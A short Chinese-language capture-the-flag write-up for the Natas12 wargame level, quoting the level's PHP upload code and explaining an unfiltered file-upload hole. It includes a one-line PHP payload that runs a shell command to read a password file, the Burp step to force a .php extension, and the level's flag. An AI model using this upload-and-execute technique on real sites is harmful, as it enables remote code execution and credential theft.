Natas12 Writeup(文件上传漏洞)
Natas12:
文件上传页面,源码如下:
function genRandomString() { $length = 10; $characters = "0123456789abcdefghijklmnopqrstuvwxyz"; $string = ""; for ($p = 0; $p < $length; $p++) { $string .= $characters[mt_rand(0, strlen($characters)-1)]; } return $string; } function makeRandomPath($dir, $ext) { do { $path = $dir."/".genRandomString().".".$ext; } while(file_exists($path)); return $path; } function makeRandomPathFromFilename($dir, $fn) { $ext = pathinfo($fn, PATHINFO_EXTENSION); return makeRandomPath($dir, $ext); } if(array_key_exists("filename", $_POST)) { $target_path = makeRandomPathFromFilename("upload", $_POST["filename"]); if(filesize($_FILES['uploadedfile']['tmp_name']) > 1000) { echo "File is too big"; } else { if(move_uploaded_file($_FILES['uploadedfile']['tmp_name'], $target_path)) { echo "The file <a href=\"$target_path\">$target_path</a> has been uploaded"; } else{ echo "There was an error uploading the file, please try again!"; } } } else {
查看源码,发现没做过滤,只是把上传后的文件名及后缀名修改了,思路就是利用文件上传漏洞上传一个PHP文件读取密码。
1.构造一个简单的test.php文件,用于读取/etc/natas_webpass/natas13,代码如下。
<?php system('cat /etc/natas_webpass/natas13'); ?>
2.点击上传php文件,用burp拦截,修改name后缀为php,点击Go,上传成功。
3.URL访问返回的php页面,得到flag。
flag:jmLTY0qiPZBbaKc9341cqPQZBJv7MQbY